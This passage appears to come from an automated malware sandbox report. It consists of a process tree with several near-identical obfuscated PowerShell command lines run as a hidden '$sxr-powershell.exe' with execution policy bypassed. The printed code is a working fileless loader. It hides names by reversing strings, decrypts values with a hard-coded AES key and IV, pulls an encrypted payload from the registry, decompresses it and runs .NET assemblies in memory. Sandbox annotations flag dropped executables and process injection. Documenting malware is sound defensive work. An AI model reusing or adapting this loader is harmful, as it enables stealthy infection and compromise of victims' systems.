'')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:5308
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:5876
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:6036
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 